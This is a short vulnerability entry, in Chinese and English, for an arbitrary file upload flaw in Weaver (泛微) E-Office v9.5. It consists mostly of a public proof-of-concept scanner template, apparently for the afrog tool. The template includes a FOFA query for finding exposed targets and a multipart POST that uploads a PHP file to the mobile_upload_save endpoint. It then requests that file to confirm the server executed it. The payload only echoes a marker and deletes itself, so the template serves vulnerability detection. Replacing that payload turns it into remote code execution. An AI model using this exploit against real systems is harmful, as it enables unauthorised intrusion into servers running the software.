漏洞描述
weaver E-Office v9.5 file upload vulnerability official website:https://www.e-office.cn/
FOFA: app="泛微-EOffice"
eoffice-v9-mobile-upload-save-fileupload: 泛微 E-Office v9.5 mobile_upload_save 任意文件上传漏洞
PoC代码[已公开]
id: eoffice-v9-mobile-upload-save-fileupload
info:
name: 泛微 E-Office v9.5 mobile_upload_save 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |
weaver E-Office v9.5 file upload vulnerability official website:https://www.e-office.cn/
FOFA: app="泛微-EOffice"
reference:
- https://github.com/sunyixuan1228/cve/blob/main/weaver.md?ref=www.ctfiot.com
- https://www.ctfiot.com/116750.html
tags: eoffice,ecology,fileupload
created: 2023/07/11
set:
randstr: randomLowercase(4)
randbody: randomLowercase(32)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"upload_quwan\";filename=\"uploadsavex.phP.\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
<?php echo \"{{randbody}}\";unlink(__FILE__);?>\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"uploadsavex.phP."')
output:
search: '"\",(?P<filename>[0-9]{10}),\"uploadsavex.phP".bsubmatch(response.body)'
filename: search["filename"]
r1:
request:
method: GET
path: /attachment/{{filename}}/uploadsavex.phP
expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()